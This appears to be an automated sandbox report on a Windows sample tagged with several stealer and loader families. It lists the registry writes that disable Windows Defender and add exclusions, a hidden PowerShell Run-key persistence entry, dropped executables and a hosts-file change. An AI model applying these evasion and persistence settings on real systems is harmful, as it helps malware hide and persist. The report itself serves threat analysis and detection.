Malware Analysis Report

2025-08-10 21:54

Sample ID 231025-fha5faec39
Target 3OJ24hE.exe
SHA256 6d2b707491bf480c2cc814be290b53e56acc31e2bebec8bb98fc2242393e8581
Tags
amadey dcrat glupteba raccoon redline smokeloader 6a6a005b9aa778f606280c5fa24ae595 grome kinza up3 backdoor discovery dropper evasion infostealer loader persistence rat spyware stealer trojan upx zgrat @ytlogsbot google phishing
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

6d2b707491bf480c2cc814be290b53e56acc31e2bebec8bb98fc2242393e8581

Threat Level: Known bad

The file 3OJ24hE.exe was found to be: Known bad.

Malicious Activity Summary

amadey dcrat glupteba raccoon redline smokeloader 6a6a005b9aa778f606280c5fa24ae595 grome kinza up3 backdoor discovery dropper evasion infostealer loader persistence rat spyware stealer trojan upx zgrat @ytlogsbot google phishing

Windows security bypass

RedLine payload

ZGRat

Raccoon

Amadey

Suspicious use of NtCreateUserProcessOtherParentProcess

SmokeLoader

DcRat

Glupteba

RedLine

Detected google phishing page

Detect ZGRat V1

Raccoon Stealer payload

Glupteba payload

Modifies Windows Defender Real-time Protection settings

Modifies boot configuration data using bcdedit

Downloads MZ/PE file

Stops running service(s)

Modifies Windows Firewall

Drops file in Drivers directory

Possible attempt to disable PatchGuard

Checks computer location settings

Executes dropped EXE

Loads dropped DLL

Unexpected DNS network traffic destination

Checks BIOS information in registry

UPX packed file

Windows security modification

Reads user/profile data of web browsers

Checks installed software on the system

Accesses cryptocurrency files/wallets, possible credential harvesting

Legitimate hosting services abused for malware hosting/C2

Adds Run key to start application

Drops file in System32 directory

Suspicious use of SetThreadContext

Launches sc.exe

Drops file in Windows directory

Checks for VirtualBox DLLs, possible anti-VM trick

Drops file in Program Files directory

Program crash

Enumerates physical storage devices

Unsigned PE

Suspicious behavior: MapViewOfSection

Uses Task Scheduler COM API

Modifies Internet Explorer settings

Suspicious behavior: LoadsDriver

Suspicious behavior: GetForegroundWindowSpam

Creates scheduled task(s)

Checks SCSI registry key(s)

Suspicious use of FindShellTrayWindow

Enumerates system info in registry

Suspicious use of AdjustPrivilegeToken

Modifies system certificate store

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Modifies registry class

Modifies data under HKEY_USERS

Suspicious use of WriteProcessMemory

Suspicious use of SendNotifyMessage

Suspicious use of SetWindowsHookEx

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-10-25 04:51

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-10-25 04:51

Reported

2023-10-25 04:59

Platform

win7-20231023-en

Max time kernel

171s

Max time network

306s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\EEE5.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\EEE5.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\EEE5.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\EEE5.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\EEE5.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\EEE5.exe N/A

Raccoon

stealer raccoon

Raccoon Stealer payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

Windows security bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\wUBDPVxDQVpvNZiy = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\KrPQunXfXpAVC = "0" C:\Windows\system32\bcdedit.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR = "0" C:\Windows\system32\conhost.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\nBRnpywzcTvqknVB = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\wUBDPVxDQVpvNZiy = "0" C:\Windows\system32\conhost.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\system32\conhost.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\DlbZONUGhjVU2 = "0" C:\Windows\system32\conhost.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\system32\DllHost.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\system32\bcdedit.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\system32\conhost.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\system32\conhost.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR = "0" C:\Windows\system32\conhost.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\system32\conhost.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\DlbZONUGhjVU2 = "0" C:\Windows\system32\conhost.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\31839b57a4f11171d6abc8bbc4451ee4.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\system32\conhost.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\system32\conhost.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\GpfcWYRxKqUn = "0" C:\Windows\system32\DllHost.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\GpfcWYRxKqUn = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\KrPQunXfXpAVC = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\oVhJPNkDU = "0" C:\Windows\system32\conhost.exe N/A

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\System32\drivers\etc\hosts C:\Program Files\Google\Chrome\updater.exe N/A
File created C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Possible attempt to disable PatchGuard

evasion

Stops running service(s)

evasion

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7zSBE11.tmp\Install.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\E7B0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\E8BB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\vk8qw0bZ.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\EB5B.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TM0pC3TM.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\YD6bx5XP.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\EEE5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Dk37rF7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\F5B9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2Jf821dM.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9247.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9766.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\A118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\kos2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\set16.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSB1B3.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\K.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-H8B4F.tmp\is-T2I28.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSBE11.tmp\Install.exe N/A
N/A N/A C:\Program Files (x86)\MyBurn\MyBurn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Program Files (x86)\MyBurn\MyBurn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1C41.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5BC1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\PbWqCNl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\E7B0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\E7B0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\vk8qw0bZ.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\vk8qw0bZ.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TM0pC3TM.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TM0pC3TM.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\YD6bx5XP.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\YD6bx5XP.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\YD6bx5XP.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Dk37rF7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\F5B9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\YD6bx5XP.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2Jf821dM.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9247.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9247.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9247.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9247.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9247.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9247.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\kos2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\set16.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\set16.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\set16.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSB1B3.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSB1B3.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSB1B3.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\kos2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9247.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\set16.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-H8B4F.tmp\is-T2I28.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-H8B4F.tmp\is-T2I28.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-H8B4F.tmp\is-T2I28.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-H8B4F.tmp\is-T2I28.tmp N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSB1B3.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSBE11.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSBE11.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSBE11.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-H8B4F.tmp\is-T2I28.tmp N/A
N/A N/A C:\Program Files (x86)\MyBurn\MyBurn.exe N/A
N/A N/A C:\Program Files (x86)\MyBurn\MyBurn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-H8B4F.tmp\is-T2I28.tmp N/A
N/A N/A C:\Program Files (x86)\MyBurn\MyBurn.exe N/A
N/A N/A C:\Program Files (x86)\MyBurn\MyBurn.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\system32\taskeng.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5BC1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Unexpected DNS network traffic destination

Description Indicator Process Target
Destination IP 51.159.66.125 N/A N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\EEE5.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\31839b57a4f11171d6abc8bbc4451ee4.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\EEE5.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\vk8qw0bZ.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TM0pC3TM.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\YD6bx5XP.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Windows\CurrentVersion\Run\socks5 = "powershell.exe -windowstyle hidden -Command \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\9766.exe'\"" C:\Users\Admin\AppData\Local\Temp\9766.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\E7B0.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\PbWqCNl.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\PbWqCNl.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk N/A N/A
File created C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\7zSBE11.tmp\Install.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks for VirtualBox DLLs, possible anti-VM trick

Description Indicator Process Target
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\MyBurn\is-ONU27.tmp C:\Users\Admin\AppData\Local\Temp\is-H8B4F.tmp\is-T2I28.tmp N/A
File created C:\Program Files (x86)\MyBurn\is-CA46A.tmp C:\Users\Admin\AppData\Local\Temp\is-H8B4F.tmp\is-T2I28.tmp N/A
File opened for modification C:\Program Files (x86)\MyBurn\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-H8B4F.tmp\is-T2I28.tmp N/A
File opened for modification C:\Program Files (x86)\MyBurn\MyBurn.exe C:\Users\Admin\AppData\Local\Temp\is-H8B4F.tmp\is-T2I28.tmp N/A
File created C:\Program Files (x86)\MyBurn\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-H8B4F.tmp\is-T2I28.tmp N/A
File created C:\Program Files (x86)\MyBurn\is-1TQHP.tmp C:\Users\Admin\AppData\Local\Temp\is-H8B4F.tmp\is-T2I28.tmp N/A
File created C:\Program Files (x86)\MyBurn\is-J7HH3.tmp C:\Users\Admin\AppData\Local\Temp\is-H8B4F.tmp\is-T2I28.tmp N/A
File created C:\Program Files (x86)\MyBurn\is-AA328.tmp C:\Users\Admin\AppData\Local\Temp\is-H8B4F.tmp\is-T2I28.tmp N/A
File created C:\Program Files (x86)\MyBurn\Sounds\is-EI6FU.tmp C:\Users\Admin\AppData\Local\Temp\is-H8B4F.tmp\is-T2I28.tmp N/A
File created C:\Program Files (x86)\MyBurn\Sounds\is-8PCAA.tmp C:\Users\Admin\AppData\Local\Temp\is-H8B4F.tmp\is-T2I28.tmp N/A
File created C:\Program Files (x86)\MyBurn\is-Q23MT.tmp C:\Users\Admin\AppData\Local\Temp\is-H8B4F.tmp\is-T2I28.tmp N/A
File created C:\Program Files (x86)\MyBurn\is-V9L1G.tmp C:\Users\Admin\AppData\Local\Temp\is-H8B4F.tmp\is-T2I28.tmp N/A
File created C:\Program Files\Google\Chrome\updater.exe C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A
File created C:\Program Files\Google\Libs\WR64.sys C:\Program Files\Google\Chrome\updater.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\rss C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
